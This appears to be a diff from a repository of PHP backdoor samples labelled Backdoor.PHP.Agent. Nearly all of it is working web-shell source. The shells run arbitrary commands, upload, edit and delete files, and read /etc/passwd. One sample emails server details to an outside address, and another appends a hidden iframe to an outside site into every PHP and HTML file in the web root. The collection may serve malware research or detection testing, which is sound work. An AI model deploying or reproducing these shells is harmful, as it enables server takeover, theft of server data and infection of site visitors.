s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><p align=\"center\">";
print "<textarea rows=\"18\" name=\"S1\" cols=\"89\" style=\"font-family: Verdana;
font-size: 8pt; border: 1px solid #000000\">{$conteudo}</textarea></p>";
echo "<p align=\"center\">";
echo "<input type=\"submit\" value=\"Simpan\" name=\"B2\" style=\" border: 1px solid
#000000\"> ";
echo "<input type=\"button\" value=\"Tutup\"
Onclick=\"javascript:window.location='{$fstring}&amp;chdir={$chdir}'\" name=\"B1\" style=\"
border: 1px solid #000000\"> ";
echo "</form>";
echo "</td>";
echo "</tr>";
echo "</table>";
}
elseif (@$_GET['action'] == 'save') {
$filename = "$chdir".$_GET['file'];
$somecontent = $_POST['S1'];
$somecontent = stripslashes(trim($somecontent));
if (is_writable($filename)) {
@$handle = fopen ($filename, "w");
@$fw = fwrite($handle, $somecontent);
@fclose($handle);
if ($handle && $fw) {
$msg = "<font color=\"#000080\">{$_GET['file']}</font>, <font
color=\"#008000\">berhasil diedit!</font>";
}
} else {
$msg = "<font color=\"#000000\">{$_GET['file']},</font> <font color=\"#FF0000\">tidak
bisa ditulisi!</font>";
}
}
// Informaçs
$cmdget = '';
if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }
if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }
$cmdget = htmlspecialchars($cmdget);
function asdads() {
$asdads = '';
if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; }
if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; }
if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; }
if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; }
if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; }
return $asdads;
}
echo "<form method=\"POST\" name=\"cmd\"
action=\"{$fstring}&amp;action=cmd&amp;chdir=$chdir\">";
echo "<fieldset style=\"border: 1px solid #000000; padding: 2\">";
echo "<legend>Informasi</legend>";
echo "<br><table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse:
collapse; font-family: Verdana; font-size: 10px\" width=\"100%\">";
echo "<tr>";
echo "<td width=\"8%\">";
echo " <b>Sistem </b> </td> ";
echo "<td width=\"92%\">: {$OS}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo " <b>Nama </b></td> ";
echo "<td width=\"92%\">: {$UNAME}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo " <b>PHP </b></td> ";
echo "<td width=\"92%\">: {$PHPv}, <b> Safe Mode :</b> {$SafeMode}</td>";
echo "</tr>";
if (strtoupper(substr($OS, 0,3) != 'WIN')) {
$Methods = asdads();
if ($Methods == '') { $Methods = "???"; }
echo "<tr>";
echo "<td width=\"8%\">";
echo "<b>Methods </b></td> ";
echo "<td width=\"92%\">: {$Methods}</td>";
echo "</tr>";
}
echo "<tr>";
echo "<td width=\"8%\">";
echo " <b>IP </b></td> ";
echo "<td width=\"92%\">: {$IpServer}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo " <b>Perintah </b></td> ";
echo "<td width=\"92%\">: <input type=\"text\" size=\"70\" name=\"cmd\" value=\"{$cmdget}\"
style=\" font-size: 8 pt; border: 1px solid #000000\"> <input type=\"submit\"
name=\"action\" value=\"Kirim\" style=\" font-size: 8 pt; border: 1px solid
#000000\"></td>";
echo "</tr>";
echo "</table><br>";
echo "</fieldset></form>";
// Dir
echo "<form method=\"POST\" action=\"{$fstring}&amp;action=upload&amp;chdir=$chdir\"
enctype=\"multipart/form-data\">";
echo "<!--webbot bot=\"FileUpload\" u-file=\"_private/form_results.csv\"
s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><fieldset style=\"border: 1px solid
#000000; padding: 2\">";
if (is_writable("$chdir")) {
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
echo "<legend>Dir <b>YES</b>: {$chdir} - <a href=\"#[New Dir]\"
onclick=\"Mkdir('{$chdir}');\">Folder Baru</a> | <a href=\"#[New File]\"
onclick=\"Newfile('{$chdir}')\">File Baru</a> | <a
href=\"{$fstring}&amp;action=cmd&amp;chdir={$chdir}&amp;cmd=$newuser\">Remote
Access</a></legend>";
} else {
echo "<legend>Dir <b>YES</b>: {$chdir} - <a href=\"#[New Dir]\"
onclick=\"Mkdir('{$chdir}');\">Folder Baru</a> | <a href=\"#[New File]\"
onclick=\"Newfile('{$chdir}')\">File Baru</a> | <a
href=\"{$fstring}&amp;action=backtool&amp;chdir={$chdir}&amp;write=yes\">Kembali</a></legend
>";
}
}
else {
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
echo "<legend>Dir NO: {$chdir} - <a href=\"#[New Dir]\"
onclick=\"Mkdir('{$chdir}');\">Foldr Baru</a> | <a href=\"#[New File]\"
onclick=\"Newfile('{$chdir}')\">File Baru</a> | <a
href=\"{$fstring}&amp;action=cmd&amp;chdir={$chdir}&amp;cmd={$newuser}\">Remote
Access</a></legend>";
} else {
echo "<legend>Dir NO: {$chdir} - <a href=\"#[New Dir]\"
onclick=\"Mkdir('{$chdir}');\">Folder Baru</a> | <a href=\"#[New File]\"
onclick=\"Newfile('{$chdir}')\">File Baru</a> | <a
href=\"{$fstring}&amp;action=backtool&amp;chdir={$chdir}&amp;write=no\">Kembali</a></legend>
";
}
}
if (@!$handle = opendir("$chdir")) {
echo " Gue gak bisa masuk folder, <a href=\"{$fstring}\">Klik sini!</a> untuk embali ke
folder ori!</br>";
}
else {
echo " <table border=\"0\" cellpadding=\"5\" cellspacing=\"0\" width=\"100%\">";
echo " <tr>";
echo " <td width=\"100%\" colspan=\"4\"> Upload:";
echo " <input type=\"file\" name=\"userfile\" size=\"65\" style=\" border-style:
solid; border-width: 1\">";
echo " <input type=\"submit\" value=\"Kirim\" name=\"B1\" style=\" border: 1px solid
#000000\"></td>";
echo " </tr>";
echo " <tr>";
echo " <td width=\"100%\" colspan=\"4\"> </td>";
echo " </tr>";
echo " <tr>";
echo " <td width=\"100%\" colspan=\"4\">";
if (@!$msg) {
echo " <p align=\"left\">Messages</td>";
} else {
echo " <p align=\"left\">$msg</td>";
}
echo " </tr>";
echo " <tr>";
echo " <td width=\"100%\" colspan=\"4\"> </td>";
echo " </tr></table> ";
echo " <table border=\"1\" cellpadding=\"2\" cellspacing=\"0\" width=\"100%\">";
echo " <tr bgcolor=\"#FF6600\" align=\"center\"> ";
echo " <td > Permision</td>";
echo " <td > Nama File </td>";
echo " <td > Kapasitas </td>";
echo " <td > Perintah</td>";
echo " </tr>";
$colorn = 0;
while (false !== ($file = readdir($handle))) {
if ($file != '.') {
if ($colorn == 0) {
$color = "style=\"background-color: #FF9900\"";
}
elseif ($colorn == 1) {
$color = "style=\"background-color: #FFCC33\"";
}
if (@is_dir("$chdir"."$file")) {
$file = $file.'/';
$mode = 'chdir';
} else {
$mode = 'edit';
}
if (@substr("$chdir", strlen($chdir) -1, 1) != '/') {
$chdir .= '/';
}
if ($file == '../') {
$lenpath = strlen($chdir); $baras = 0;
for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } }
$chdir_ = explode("/", $chdir);
$chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir);
}
$perms = @fileperms ("$chdir"."$file");
if ($perms == '') {
$perms = '???';
}
$size = @filesize ("$chdir"."$file");
$size = $size / 1024;
$size = explode(".", $size);
if (@$size[1] != '') {
$size = $size[0].'.'.@substr("$size[1]", 0, 2);
} else {
$size = $size[0];
}
if ($size == 0) {
if ($mode == 'chdir') {
$size = '???';
}
}
echo "<tr>";
echo "<td align=\"center\" $color> $perms</td>";
if (@is_writable ("$chdir"."$file")) {
if ($mode == 'chdir') {
if ($file == '../') {
echo "<td $color> <b><a href=\"{$fstring}&amp;chdir=$chdirpox\"><font
color=\"#008000\">$file</font></a></b> </td>";
} else {
echo "<td $color> <b><a href=\"{$fstring}&amp;chdir={$chdir}{$file}\"><font
color=\"#008000\">$file</font></a> </b></td>";
}
} else {
if (is_readable("$chdir"."$file")) {
echo "<td $color> <a
href=\"{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file\">$file</a> </td>";
} else {
echo "<td $color> $file </td>";
}
}
}
else {
if ($mode == 'chdir') {
if ($file == '../') {
echo "<td $color> <a href=\"{$fstring}&amp;chdir=$chdirpox\">$file</a>
</td>";
} else {
echo "<td $color> <a
href=\"{$fstring}&amp;chdir={$chdir}{$file}\">$file</a></td>";
}
} else {
if (@is_readable("$chdir"."$file")) {
echo "<td $color> <a
href=\"{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file\">$file</a> </td>";
} else {
echo "<td $color> $file</td>";
}
}
}
echo "<td align=\"right\" $color> $size KB</td>";
if ($mode == 'edit') {
echo "<td align=\"center\" $color> <a href=\"#{$file}\"
onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">Rename</a> | <a
href=\"{$fstring}&amp;action=del&amp;chdir={$chdir}&amp;file={$file}&amp;type=file\">Del</a>
| <a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">Chmod</a> | <a href=\"#{$file}\"
onclick=\"Copy('{$chdir}', '{$file}')\">Copy</a> </td>";
} else {
echo "<td align=\"center\" $color> <a href=\"#{$file}\"
onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">Rename</a> | <a
href=\"{$fstring}&amp;action=del&amp;chdir={$chdir}&amp;file={$file}&amp;type=dir\">Del</a>
| <a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">Chmod</a> | Copy </td>";
}
echo "</tr>";
if ($colorn == 0) {
$colorn = 1;
}
elseif ($colorn == 1) {
$colorn = 0;
}
}
}
closedir($handle);
}
$OS = @PHP_OS;
$UNAME = @php_uname();
$PHPv = @phpversion();
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "<i>OFF</i><BR>"; }
else { $SafeMode = "<i>$SafeMode</i><BR>"; }
$injek=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$psn=("OS = " . $OS . "<BR>UNAME = " . $UNAME . "<BR>PHPVersion = " . $PHPv . "<BR>Safe
Mode = " . $SafeMode . "<BR><font color=blue>http://" . $injek . "</font><BR>Ingat jangan
pakai Injek Ini.<BR>By: binushacker");
$header = "From: $_SERVER[SERVER_ADMIN] <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment;
filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
$to = ("binushacker@hackermail.com");
$subject = ("scan bos");
mail($to,$subject,$psn,$header);
@include "$bn";
?>
</table>
</fieldset></form>
</div>
</body>
</html>
<html>
<img src="http://uv.terra.com.br/UV?c=planeta" width=1 height=1 border=0 alt="" align="left">
</html>

75
PHP/Backdoor.PHP.Agent.al Normal file
View File

@ -0,0 +1,75 @@
<?
$dir = @getcwd();
echo "KaioWas";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}
if(!isset($_SERVER['DOCUMENT_ROOT']))
{
$n = $_SERVER['SCRIPT_NAME'];
$f = ereg_replace('\\\\', '/',$_SERVER["PATH_TRANSLATED"]);
$f = str_replace('//','/',$f);
$_SERVER['DOCUMENT_ROOT'] = eregi_replace($n, "", $f);
}
$codigo = "<IFRAME src=\"http://usuarios.arnet.com.ar/alvarezluque/morgan.html\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>\n";
$directorio = $_SERVER['DOCUMENT_ROOT'];
foreach (glob("$directorio/*.php") as $archivo) {
$fp=fopen($archivo,"a+");
fputs($fp,$codigo);
}
foreach (glob("$directorio/*.htm") as $archivh) {
$fp=fopen($archivh,"a+");
fputs($fp,$codigo);
}
foreach (glob("$directorio/*.html") as $archivl) {
$fp=fopen($archivl,"a+");
fputs($fp,$codigo);
}
?>

8342
PHP/Backdoor.PHP.Agent.am Normal file
View File

File diff suppressed because one or more lines are too long

1766
PHP/Backdoor.PHP.Agent.an Normal file
View File

File diff suppressed because it is too large Load Diff

646
PHP/Backdoor.PHP.Agent.ao Normal file
View File

@ -0,0 +1,646 @@
<?php
session_start();
error_reporting(0);
$password = "password"; //Change this to your password ;)
$version = "0.7B";
$functions = array('Clear Screen' => 'ClearScreen()',
'Clear History' => 'ClearHistory()',
'Can I function?' => "runcommand('canirun','GET')",
'Get server info' => "runcommand('showinfo','GET')",
'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
'Running processes' => "runcommand('ps -aux','GET')",
'Readme' => "runcommand('shellhelp','GET')"
);
$thisfile = basename(__FILE__);
$style = '<style type="text/css">
.cmdthing {
border-top-width: 0px;
font-weight: bold;
border-left-width: 0px;
font-size: 10px;
border-left-color: #000000;
background: #000000;
border-bottom-width: 0px;
border-bottom-color: #FFFFFF;
color: #FFFFFF;
border-top-color: #008000;
font-family: verdana;
border-right-width: 0px;
border-right-color: #000000;
}
input,textarea {
border-top-width: 1px;
font-weight: bold;
border-left-width: 1px;
font-size: 10px;
border-left-color: #FFFFFF;
background: #000000;
border-bottom-width: 1px;
border-bottom-color: #FFFFFF;
color: #FFFFFF;
border-top-color: #FFFFFF;
font-family: verdana;
border-right-width: 1px;
border-right-color: #FFFFFF;
}
A:hover {
text-decoration: none;
}
table,td,div {
border-collapse: collapse;
border: 1px solid #FFFFFF;
}
body {
color: #FFFFFF;
font-family: verdana;
}
</style>';
$sess = __FILE__.$password;
if(isset($_POST['p4ssw0rD']))
{
if($_POST['p4ssw0rD'] == $password)
{
$_SESSION[$sess] = $_POST['p4ssw0rD'];
}
else
{
die("Wrong password");
}
}
if($_SESSION[$sess] == $password)
{
if(isset($_SESSION['workdir']))
{
if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir']))
{
chdir($_SESSION['workdir']);
}
}
if(isset($_FILES['uploadedfile']['name']))
{
$target_path = "./";
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
}
}
if(isset($_GET['runcmd']))
{
$cmd = $_GET['runcmd'];
print "<b>".get_current_user()."~# </b>". htmlspecialchars($cmd)."<br>";
if($cmd == "")
{
print "Empty Command..type \"shellhelp\" for some ehh...help";
}
elseif($cmd == "upload")
{
print '<br>Uploading to: '.realpath(".");
if(is_writable(realpath(".")))
{
print "<br><b>I can write to this directory</b>";
}
else
{
print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>";
}
}
elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file)))
{
if(file_exists($file[1]) && is_dir($file[1]))
{
chdir($file[1]);
$_SESSION['workdir'] = $file[1];
print "Current directory changed to ".$file[1];
}
else
{
print "Directory not found";
}
}
elseif(strtolower($cmd) == "shellhelp")
{
print '<b><font size=7>Ajax/PHP Command Shell</b></font>
&copy; By Ironfist
The shell can be used by anyone to command any server, the main purpose was
to create a shell that feels as dynamic as possible, is expandable and easy
to understand.
If one of the command execution functions work, the shell will function fine.
Try the "canirun" command to check this.
Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re
not used to these commands, google a little.
<b>Custom Functions</b>
If you want to add your own custom command in the Quick Commands list, check
out the code. The $function array contains \'func name\' => \'javascript function\'.
Take a look at the built-in functions for examples.
I know this readme isn\'t providing too much information, but hell, does this shell
even require one :P
- Iron
';
}
elseif(ereg("editfile (.*)",$cmd,$file))
{
if(file_exists($file[1]) && !is_dir($file[1]))
{
print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">";
$contents = file($file[1]);
foreach($contents as $line)
{
print htmlspecialchars($line);
}
print "</textarea><br><input size=80 type=text name=filetosave value=".$file[1]."><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
}
else
{
print "File not found.";
}
}
elseif(ereg("deletefile (.*)",$cmd,$file))
{
if(is_dir($file[1]))
{
if(rmdir($file[1]))
{
print "Directory succesfully deleted.";
}
else
{
print "Couldn't delete directory!";
}
}
else
{
if(unlink($file[1]))
{
print "File succesfully deleted.";
}
else
{
print "Couldn't delete file!";
}
}
}
elseif(strtolower($cmd) == "canirun")
{
print "If any of these functions is Enabled, the shell will function like it should.<br>";
if(function_exists(passthru))
{
print "Passthru: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "Passthru: <b><font color=red>Disabled</b></font><br>";
}
if(function_exists(exec))
{
print "Exec: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "Exec: <b><font color=red>Disabled</b></font><br>";
}
if(function_exists(system))
{
print "System: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "System: <b><font color=red>Disabled</b></font><br>";
}
if(function_exists(shell_exec))
{
print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
}
print "<br>Safe mode will prevent some stuff, maybe command execution, if you're looking for a <br>reason why the commands aren't executed, this is probally it.<br>";
if( ini_get('safe_mode') ){
print "Safe Mode: <b><font color=red>Enabled</b></font>";
}
else
{
print "Safe Mode: <b><font color=green>Disabled</b></font>";
}
print "<br><br>Open_basedir will block access to some files you <i>shouldn't</i> access.<br>";
if( ini_get('open_basedir') ){
print "Open_basedir: <b><font color=red>Enabled</b></font>";
}
else
{
print "Open_basedir: <b><font color=green>Disabled</b></font>";
}
}
//About the shell
elseif(ereg("listdir (.*)",$cmd,$directory))
{
if(!file_exists($directory[1]))
{
die("Directory not found");
}
//Some variables
chdir($directory[1]);
$i = 0; $f = 0;
$dirs = "";
$filez = "";
if(!ereg("/$",$directory[1])) //Does it end with a slash?
{
$directory[1] .= "/"; //If not, add one
}
print "Listing directory: ".$directory[1]."<br>";
print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";
if ($handle = opendir($directory[1])) {
while (false !== ($file = readdir($handle))) {
if(is_dir($file))
{
$dirs[$i] = $file;
$i++;
}
else
{
$filez[$f] = $file;
$f++;
}
}
print "<td>";
foreach($dirs as $directory)
{
print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($directory)."');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir ".realpath($directory)."','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir ".realpath($directory)."','GET'); \">".$directory."</b><br>";
}
print "</td><td>";
foreach($filez as $file)
{
print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($file)."');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile ".realpath($file)."','GET');\">".$file."</u><br>";
}
print "</td></table>";
}
}
elseif(strtolower($cmd) == "about")
{
print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version";
}
//Show info
elseif(strtolower($cmd) == "showinfo")
{
if(function_exists(disk_free_space))
{
$free = disk_free_space("/") / 1000000;
}
else
{
$free = "N/A";
}
if(function_exists(disk_total_space))
{
$total = trim(disk_total_space("/") / 1000000);
}
else
{
$total = "N/A";
}
$path = realpath (".");
print "<b>Free:</b> $free / $total MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>";
if(function_exists(passthru))
{
passthru("uname -a");
}
else
{
print "Passthru is disabled :(";
}
}
//Read /etc/passwd
elseif(strtolower($cmd) == "etcpasswdfile")
{
$pw = file('/etc/passwd/');
foreach($pw as $line)
{
print $line;
}
}
//Execute any other command
else
{
if(function_exists(passthru))
{
passthru($cmd);
}
else
{
if(function_exists(exec))
{
exec("ls -la",$result);
foreach($result as $output)
{
print $output."<br>";
}
}
else
{
if(function_exists(system))
{
system($cmd);
}
else
{
if(function_exists(shell_exec))
{
print shell_exec($cmd);
}
else
{
print "Sorry, none of the command functions works.";
}
}
}
}
}
}
elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent']))
{
$file = $_POST['filetosave'];
if(!is_writable($file))
{
if(!chmod($file, 0777))
{
die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^
}
}
$fh = fopen($file, 'w');
$dt = $_POST['filecontent'];
fwrite($fh, $dt);
fclose($fh);
}
else
{
?>
<html>
<title>Command Shell ~ <?php print getenv("HTTP_HOST"); ?></title>
<head>
<?php print $style; ?>
<SCRIPT TYPE="text/javascript">
function sf(){document.cmdform.command.focus();}
var outputcmd = "";
var cmdhistory = "";
function ClearScreen()
{
outputcmd = "";
document.getElementById('output').innerHTML = outputcmd;
}
function ClearHistory()
{
cmdhistory = "";
document.getElementById('history').innerHTML = cmdhistory;
}
function deletefile(file)
{
deleteit = window.confirm("Are you sure you want to delete\n"+file+"?");
if(deleteit)
{
runcommand('deletefile ' + file,'GET');
}
}
var http_request = false;
function makePOSTRequest(url, parameters) {
http_request = false;
if (window.XMLHttpRequest) {
http_request = new XMLHttpRequest();
if (http_request.overrideMimeType) {
http_request.overrideMimeType('text/html');
}
} else if (window.ActiveXObject) {
try {
http_request = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
http_request = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {}
}
}
if (!http_request) {
alert('Cannot create XMLHTTP instance');
return false;
}
http_request.open('POST', url, true);
http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http_request.setRequestHeader("Content-length", parameters.length);
http_request.setRequestHeader("Connection", "close");
http_request.send(parameters);
}
function SaveFile()
{
var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
"&filecontent=" + encodeURI( document.getElementById("area1").value );
makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly.";
}
function runcommand(urltoopen,action,contenttosend){
cmdhistory = "<br>&nbsp;<i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory;
document.getElementById('history').innerHTML = cmdhistory;
if(urltoopen == "clear")
{
ClearScreen();
}
var ajaxRequest;
try{
ajaxRequest = new XMLHttpRequest();
} catch (e){
try{
ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try{
ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e){
alert("Wicked error, nothing we can do about it...");
return false;
}
}
}
ajaxRequest.onreadystatechange = function(){
if(ajaxRequest.readyState == 4){
outputcmd = "<pre>" + outputcmd + ajaxRequest.responseText +"</pre>";
document.getElementById('output').innerHTML = outputcmd;
var objDiv = document.getElementById("output");
objDiv.scrollTop = objDiv.scrollHeight;
}
}
ajaxRequest.open(action, "?runcmd="+urltoopen , true);
if(action == "GET")
{
ajaxRequest.send(null);
}
document.cmdform.command.value='';
return false;
}
function set_tab_html(newhtml)
{
document.getElementById('commandtab').innerHTML = newhtml;
}
function set_tab(newtab)
{
if(newtab == "cmd")
{
newhtml = '&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>';
}
else if(newtab == "upload")
{
runcommand('upload','GET');
newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>';
}
else if(newtab == "workingdir")
{
<?php
$folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\"";
$pathparts = explode("/",realpath ("."));
foreach($pathparts as $folder)
{
$folders .= $folder."/";
}
$folders .= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\" onclick=\"document.workdir.changeworkdir.value=\'".dirname(__FILE__)."\'>".dirname(__FILE__)."</i>";
?>
newhtml = '<?php print $folders; ?>';
}
else if(newtab == "filebrowser")
{
newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory';
runcommand('listdir .','GET');
}
else if(newtab == "createfile")
{
newhtml = '<b>File Editor, under construction.</b>';
document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.')."/".rand(1000,999999).".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
}
document.getElementById('commandtab').innerHTML = newhtml;
}
</script>
</head>
<body bgcolor=black onload="sf();" vlink=white alink=white link=white>
<table border=1 width=100% height=100%>
<td width=15% valign=top>
<form name="extras"><br>
<center><b>Quick Commands</b><br>
<div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
<?php
foreach($functions as $name => $execute)
{
print '&nbsp;<input type="button" value="'.$name.'" onclick="'.$execute.'"><br>';
}
?>
</center>
</div>
</form>
<center><b>Command history</b><br></center>
<div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
<br>
<center><b>About</b><br></center>
<div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'>
<br>
<b><font size=3>Ajax/PHP Command Shell</b></font><br>by Ironfist
<br>
Version <?php print $version; ?>
<br>
<br>
<br>Thanks to everyone @
<a href="http://www.ironwarez.info" target=_blank>SharePlaza</a>
<br>
<a href="http://www.milw0rm.com" target=_blank>milw0rm</a>
<br>
and special greetings to everyone in rootshell
</div>
</td>
<td width=70%>
<table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0>
<b style="cursor:crosshair" onclick="set_tab('cmd');">[Execute command]</b>
<b style="cursor:crosshair" onclick="set_tab('upload');">[Upload file]</b>
<b style="cursor:crosshair" onclick="set_tab('workingdir');">[Change directory]</b>
<b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Filebrowser]</b>
<b style="cursor:crosshair" onclick="set_tab('createfile');">[Create File]</b>
</font></td>
<tr>
<td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div>
<tr>
<td height=1% width=100% valign=top>
<div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');">
<b>Command</b>: <input type=text name=command class=cmdthing size=100%><br>
</form>
</div>
</td>
</table>
</td>
</table>
</body>
</html>
<?php
}
} else {
print "<center><table border=0 height=100%>
<td valign=middle>
<form action=".basename(__FILE__)." method=POST>You are not logged in, please login.<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\">
</form>";
}
?>

181
PHP/Backdoor.PHP.Agent.ap Normal file
View File

@ -0,0 +1,181 @@
<?
/*
Backdoor php v0.1
Coded By Charlichaplin
charlichaplin@gmail.com
Join me: irc.fr.worldnet.net #s-c
Greetz: My dog :)
*/
class backdoor {
var $pwd;
var $rep;
var $list = array();
var $file;
var $edit;
var $fichier;
var $del;
var $shell;
var $proxy;
function dir() {
if(!empty($this->rep)) {
$dir = opendir($this->rep);
} else {
$dir = opendir($this->pwd);
}
while($f = readdir($dir)) {
if ($f !="." && $f != "..") {
$this->list[] = $f;
}
}
}
function view() {
$this->file = htmlentities(highlight_file($this->file));
}
function edit() {
if(!is_writable($this->edit)) {
echo "Ecriture impossible sur le fichier";
} elseif(!file_exists($this->edit)) {
echo "Le fichier n'existe pas ";
} elseif(!$this->fichier) {
$fp = fopen($this->edit,"r");
$a = "";
while(!feof($fp)) {
$a .= fgets($fp,1024);
}
echo"<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?edit=".$this->edit."\"><textarea name=\"fichier\" cols=\"50\" rows=\"20\">".htmlentities($a)."</textarea><input name=\"Submit\" type=\"submit\"></form>";
} else {
$fp = fopen($this->edit,"w+");
fwrite($fp, $this->fichier);
fclose($fp);
echo "Le fichier a été modifié";
}
}
function del() {
if(is_file($this->del)) {
if(unlink($this->del)) {
echo "Fichier supprimé";
} else {
